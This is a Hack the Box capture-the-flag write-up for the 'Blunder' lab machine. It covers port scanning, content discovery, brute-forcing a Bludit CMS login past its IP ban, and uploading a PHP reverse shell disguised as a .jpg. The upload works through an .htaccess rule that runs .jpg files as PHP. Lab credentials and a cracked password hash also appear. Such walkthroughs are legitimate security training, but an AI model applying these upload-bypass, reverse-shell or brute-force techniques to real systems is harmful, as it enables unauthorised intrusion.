Skip to content

Latest commit

 

History

History
165 lines (126 loc) · 6.88 KB

blunder.md

File metadata and controls

165 lines (126 loc) · 6.88 KB

Hack the Box - Blunder

Machine IP: 10.10.10.191

Reconnaissance

NMAP

▶ nmap -Pn -sS -O -p- 10.10.10.191 -T4 --min-rate 1000 -oN ports.nmap

Nmap scan report for 10.10.10.191
Host is up (0.19s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE  SERVICE
21/tcp closed ftp
80/tcp open   http
Device type: general purpose|storage-misc|WAP
Running (JUST GUESSING): Linux 5.X|4.X|2.6.X|3.X (98%), HP embedded (91%), Ubiquiti AirOS 5.X (89%), Ubiquiti embedded (89%)
OS CPE: cpe:/o:linux:linux_kernel:5.0 cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/o:ubnt:airos:5.2.6 cpe:/h:ubnt:airmax_nanostation
Aggressive OS guesses: Linux 5.0 (98%), Linux 5.4 (93%), Linux 5.0 - 5.4 (93%), HP P2000 G3 NAS device (91%), Linux 4.15 - 5.6 (91%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 2.6.32 - 3.1 (90%), Linux 5.1 (90%), Ubiquiti Pico Station WAP (AirOS 5.2.6) (89%)
No exact OS matches for host (test conditions non-ideal).

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 134.49 seconds
▶ nmap -sC -sV -p 21,80 10.10.10.191 -oN services.nmap

Nmap scan report for 10.10.10.191
Host is up (0.18s latency).

PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: Blunder
|_http-title: Blunder | A blunder of interesting facts

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.23 seconds

HTTP 80

image

Content Discovery

▶ gobuster dir --url http://10.10.10.191 --wordlist /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --threads 20

image image

  • Bludit admin login.
▶ gobuster dir --url http://10.10.10.191 --wordlist /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt --threads 20

image image

  • Probably the CMS is running an older version.
  • Potential username fergus.

Brute-Force Credentials

  • A potential username fergus is found. Attempt to brute-force the password of this user for the CMS.

image

  • IP address gets banned after a few tries to brute-force the password.

Brute-Force Mitigation Bypass

▶ python exploit.py -l http://10.10.10.191/admin/login.php -u users.txt -p passwords.txt
  • Valid password RolandDeschain found for the user fergus. image

Login with the credentials to the Bludit dashboard. image

  • Login successful to Dashboard. image

image

  • Upload a php reverse shell to the target machine.
▶ cp /usr/share/webshells/php/php-reverse-shell.php shell.php

  • Change the IP address and Port in the shell code. image

  • Change the extension of the shell file from .php to .jpg. image

  • Upload the shell and modify the UUID by intercepting the upload request in burpsuite. image

  • Also upload the htaccess file to make the jpg executable as php.

Contents of htaccess file.

RewriteEngine off
AddType application/x-httpd-php .jpg

image

  • Browse to the location of the uploaded shell. image
  • Start a netcat listener. image

Upgrade shell to TTY image

  • Uploading linpeas.sh image

image image

Username: Hugo
Password: faca404fd5c0a31cf1897b823c695c85cffeb98d

image

Cracked Password: Password120

image

image

Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash

image

image

image